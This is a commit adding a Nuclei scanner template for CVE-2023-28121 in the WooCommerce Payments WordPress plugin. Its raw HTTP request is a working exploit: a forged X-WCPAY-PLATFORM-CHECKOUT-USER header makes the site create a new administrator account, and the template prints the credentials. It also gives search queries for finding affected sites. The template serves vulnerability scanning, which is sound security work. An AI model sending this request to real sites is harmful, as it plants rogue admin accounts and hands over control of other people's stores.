Create CVE-2023-28121.yaml (#7605)

* Create CVE-2023-28121.yaml * misc updates --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-07-03 23:45:00 +05:30 · 2023-07-03 23:45:00 +05:30 · ac390d4f9a
parent 6e5d86f529
commit ac390d4f9a
1 changed files with 69 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-28121.yaml
+++ b/http/cves/2023/CVE-2023-28121.yaml
@ -0,0 +1,69 @@
+id: CVE-2023-28121
+
+info:
+  name: WooCommerce Payments - Unauthorized Admin Access
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.
+  reference:
+    - https://github.com/gbrsh/CVE-2023-28121
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-28121
+    - https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/
+    - https://woocommerce.com/products/woocommerce-payments/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-28121
+    cwe-id: CWE-287,CWE-287
+    epss-score: 0.0021
+    cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    google-query: inurl:/wp-content/plugins/woocommerce-payments
+    publicwww-query: /wp-content/plugins/woocommerce-payments
+    vendor: automattic
+    product: woocommerce_payments
+    framework: wordpress
+  tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive
+
+variables:
+  username: "{{rand_base(6)}}"
+  password: "{{rand_base(8)}}"
+  email: "{{randstr}}@{{rand_base(5)}}.com"
+
+http:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        X-WCPAY-PLATFORM-CHECKOUT-USER: 1
+        Content-Type: application/x-www-form-urlencoded
+
+        rest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"registered_date":'
+          - '"username":'
+          - '"email":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: status
+        status:
+          - 201
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"WP_USERNAME: "+ username'
+          - '"WP_PASSWORD: "+ password'